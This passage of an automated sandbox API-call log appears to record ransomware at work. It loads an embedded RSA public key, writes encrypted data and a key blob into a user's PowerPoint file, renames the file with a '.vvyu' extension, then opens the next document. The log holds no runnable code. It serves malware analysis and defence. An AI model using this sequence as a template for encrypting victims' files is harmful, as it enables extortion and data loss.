KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.599] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.600] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.600] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.600] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.600] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.600] GetLastError () returned 0x0 [0184.600] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.600] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.601] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.601] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.601] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd840) returned 0x2d43778 [0184.601] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31498 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d314e0 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.602] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9a8 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e990 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.606] GetCurrentThreadId () returned 0x264 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36cb8 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.607] GetCurrentThreadId () returned 0x264 [0184.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9a8 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea08 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea20 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9c0 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e990 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d314e0 | out: hHeap=0x6a0000) returned 1 [0184.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.617] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xd839, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xd839, lpOverlapped=0x0) returned 1 [0184.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.618] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd83e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.618] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.620] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.620] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.620] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.620] CloseHandle (hObject=0x584) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.622] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\E ri1atxOTxxvZ19.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\e ri1atxotxxvz19.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\E ri1atxOTxxvZ19.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\e ri1atxotxxvz19.ppt.vvyu")) returned 1 [0184.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.625] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.628] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6be00ff0, ftCreationTime.dwHighDateTime=0x1d8631c, ftLastAccessTime.dwLowDateTime=0x9f5b7040, ftLastAccessTime.dwHighDateTime=0x1d89774, ftLastWriteTime.dwLowDateTime=0x9f5b7040, ftLastWriteTime.dwHighDateTime=0x1d89774, nFileSizeHigh=0x0, nFileSizeLow=0x35ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Es4lP.pptx", cAlternateFileName="ES4LP~1.PPT")) returned 1 [0184.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d314e0 [0184.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0184.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d314e0 | out: hHeap=0x6a0000) returned 1 [0184.628] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Es4lP.pptx") returned=".pptx" [0184.628] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Es4lP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\es4lp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.631] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: 